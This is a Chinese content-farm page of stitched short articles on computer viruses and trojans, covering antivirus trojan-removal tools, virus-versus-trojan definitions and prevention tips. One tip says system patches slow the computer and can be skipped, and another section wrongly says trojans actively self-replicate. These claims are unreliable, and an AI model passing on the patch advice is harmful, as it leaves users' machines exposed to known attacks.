一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好象有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.
还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!
看了“电脑病毒和木马区别是什么样的 ”文章的还看了:
浏览量:3
下载量:0
时间:
面对强大的计算机病毒,我们要怎么样去防范呢?下面由读文网小编给你做出详细的计算机病毒防范方法介绍!希望对你有帮助!
1.不用原始软盘或其他介质引导机器,对系统等原始盘实行保护:
2,。不随便使用外来软盘或其他介质,对外来软盘或其他介质必须先检查后使用:
3.做好系统软件,应用软件的备份,并定期进行数据文件备份,供系统恢复使用:
4.计算机系统要专机专用,要避免使用其他软件,如游戏软件,减少病毒感染机会:
5.接收网上传送的数据要先检查后使用,接收邮件的计算机要与系统计算机分开:
6.定期对计算机进行病毒检查,对于联网的计算机应安装实时检测病毒软件,以防止病毒传入:
7.如发现有计算机感染病毒,应立即将该台计算机从网上撤下,以防止病毒蔓延
浏览量:3
下载量:0
时间:
面对万恶的计算机病毒,我们要怎么样去防范呢?下面由读文网小编给你做出详细的计算机病毒防范方法介绍!希望对你有帮助!
1.平时打开杀毒软件的防火墙、实时防护,可以保护计算机受到侵犯。
2.为计算机打上补丁可以使电脑更安全,但是过多的补丁会使计算机变慢,可以不打。
3.不打补丁,关键是自己的习惯——不上不良网站,不下载不明软件和程序。
4.下载的程序——即使是压缩文件,先用杀毒软件杀毒后,确定安全再打开。
5.定时杀毒,养成良好的杀毒习惯。
6.在计算机上关闭远程。
右击“我的电脑”,点“属性”,点“远程”,把两个多选框的勾去掉,点“确定”。
7.不经常在电脑上插外部储存设备,如:U盘、移动硬盘、mp3等。
8.电脑突然变慢时或者计算机异常时,杀毒,严重时重装系统,断开网络,防止信息外传。
看了“ 计算机病毒如何去防范好”文章的还看了:
浏览量:2
下载量:0
时间:
为了防范计算机病毒,我们都有些什么措施呢?下面由读文网小编给你做出详细的计算机病毒防范措施介绍!希望对你有帮助!
对于技术方面,计算机网络安全技术主要有实时扫描技术、实时监测技术、防火墙、完整性检验保护技术、病毒情况分析报告技术和系统安全管理技术。综合起来,技术层面可以采取以下对策:
1) 建立安全管理制度。提高包括系统管理员和用户在内的人员的技术素质和职业道德修养。对重要部门和信息,严格做好开机查毒,及时备份数据,这是一种简单有效的方法。
2) 网络访问控制。访问控制是网络安全防范和保护的主要策略。它的主要任务是保证网络资源不被非法使用和访问。它是保证网络安全最重要的核心策略之一。访问控制涉及的技术比较广,包括入网访问控制、网络权限控制、目录级控制以及属性控制等多种手段。
3) 数据库的备份与恢复。数据库的备份与恢复是数据库管理员维护数据安全性和完整性的重要操作。备份是恢复数据库最容易和最能防止意外的保证方法。恢复是在意外发生后利用备份来恢复数据的操作。有三种主要备份策略:只备份数据库、备份数据库和事务日志、增量备份。
4) 应用密码技术。应用密码技术是信息安全核心技术,密码手段为信息安全提供了可靠保证。基于密码的数字签名和身份认证是当前保证信息完整性的最主要方法之一,密码技术主要包括古典密码体制、单钥密码体制、公钥密码体制、数字签名以及密钥管理。
5) 切断传播途径。对被感染的硬盘和计算机进行彻底杀毒处理,不使用来历不明的U 盘和程序,不随意下载网络可疑信息。
6) 提高网络反病毒技术能力。通过安装病毒防火墙,进行实时过滤。对网络服务器中的文件进行频繁扫描和监测,在工作站上采用防病毒卡,加强网络目录和文件访问权限的设置。在网络中,限制只能由服务器才允许执行的文件。
7) 研发并完善高安全的操作系统。研发具有高安全的操作系统,不给病毒得以滋生的温床才能更安全。 计算机网络的安全管理,不仅要看所采用的安全技术和防范措施,而且要看它所采取的管理措施和执行计算机安全保护法律、法规的力度。只有将两者紧密结合,才能使计算机网络安全确实有效。
计算机网络的安全管理,包括对计算机用户的安全教育、建立相应的安全管理机构、不断完善和加强计算机的管理功能、加强计算机及网络的立法和执法力度等方面。加强计算机安全管理、加强用户的法律、法规和道德观念,提高计算机用户的安全意识,对防止计算机犯罪、抵制黑客攻击和防止计算机病毒干扰,是十分重要的措施。
这就要对计算机用户不断进行法制教育,包括计算机安全法、计算机犯罪法、保密法、数据保护法等,明确计算机用户和系统管理人员应履行的权利和义务,自觉遵守合法信息系统原则、合法用户原则、信息公开原则、信息利用原则和资源限制原则,自觉地和一切违法犯罪的行为作斗争,维护计算机及网络系统的安全,维护信息系统的安全。除此之外,还应教育计算机用户和全体工作人员,应自觉遵守为维护系统安全而建立的一切规章制度,包括人员管理制度、运行维护和管理制度、计算机处理的控制和管理制度、各种资料管理制度、机房保卫管理制度、专机专用和严格分工等管理制度。 要保证计算机网络系统的安全、可靠,必须保证系统实体有个安全的物理环境条件。这个安全的环境是指机房及其设施,主要包括以下内容:
1) 计算机系统的环境条件。计算机系统的安全环境条件,包括温度、湿度、空气洁净度、腐蚀度、虫害、振动和冲击、电气干扰等方面,都要有具体的要求和严格的标准。
2) 机房场地环境的选择。计算机系统选择一个合适的安装场所十分重要。它直接影响到系统的安全性和可靠性。选择计算机房场地,要注意其外部环境安全性、地质可靠性、场地抗电磁干扰性,避开强振动源和强噪声源,并避免设在建筑物高层和用水设备的下层或隔壁。还要注意出入口的管理。
3) 机房的安全防护。机房的安全防护是针对环境的物理灾害和防止未授权的个人或团体破坏、篡改或盗窃网络设施、重要数据而采取的安全措施和对策。为做到区域安全,首先,应考虑物理访问控制来识别访问用户的身份,并对其合法性进行验证;其次,对来访者必须限定其活动范围;第三,要在计算机系统中心设备外设多层安全防护圈,以防止非法暴力入侵;第四设备所在的建筑物应具有抵御各种自然灾害的设施。
计算机网络安全是一项复杂的系统工程,涉及技术、设备、管理和制度等多方面的因素,安全解决方案的制定需要从整体上进行把握。网络安全解决方案是综合各种计算机网络信息系统安全技术,将安全操作系统技术、防火墙技术、病毒防护技术、入侵检测技术、安全扫描技术等综合起来,形成一套完整的、协调一致的网络安全防护体系。我们必须做到管理和技术并重,安全技术必须结合安全措施,并加强计算机立法和执法的力度,建立备份和恢复机制,制定相应的安全标准。此外,由于计算机病毒、计算机犯罪等技术是不分国界的,因此必须进行充分的国际合作,来共同对付日益猖獗的计算机犯罪和计算机病毒等问题。
看了“ 计算机病毒防范措施有些什么”文章的还看了:
浏览量:3
下载量:0
时间:
我们常说病毒木马!其实计算机病毒和木马是有区别的!那么它们区别是怎么样呢?下面由读文网小编给你做出详细的计算机病毒和木马区别介绍!希望对你有帮助!
计算机病毒,从程序代码而来,本来也不叫做病毒,但因为其危害性和目的性等,才有计算机专业人员将其起名为病毒,最早的计算机病毒只是因为一小段程序代码因为编写缺陷产生如死锁(死循环)等现象和效果
个别人将其应用于恶作剧、善意玩笑等,后来真的有人主动恶意编写并利用代码去“搞破坏”或“牟利”所以就成了病毒,具体计算机病毒特性就不讲了。
而木马是病毒的一种,简单地说就是一种可以驻留在中毒电脑中,可以主动复制,主动“攻击”的病毒程序。多数木马对计算机的攻击主要是大量复制和大量盗取,毁灭性的攻击极其罕见,但也不可忽视
因为如果计算机中木马后经常连接在Internet 或者 LAN中,木马程序会根据编码者的意图,随时升级,灵活应对计算机。虽然木马善于隐藏自己,但也很容易被找到。无论何种病毒,想要清理干净,首先要将其驻留内存的主程序、进程或者说是服务端,从内存中请出去,然后去除其系统属性,再“清除”即可。不详细说了,简单易懂的区别就上面那些。
看了“计算机病毒和木马区别是什么呢 ”文章的还看了:
浏览量:2
下载量:0
时间:
由于计算机病毒太厉害了,我们要用什么方法去查杀防范好呢?下面由读文网小编给你做出详细的计算机病毒防范方法介绍!希望对你有帮助!
计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。
计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。
计算机病毒是一个程序,一段可执行码。就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。
它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
看了“计算机病毒如何去防范 ”文章的还看了:
浏览量:3
下载量:0
时间: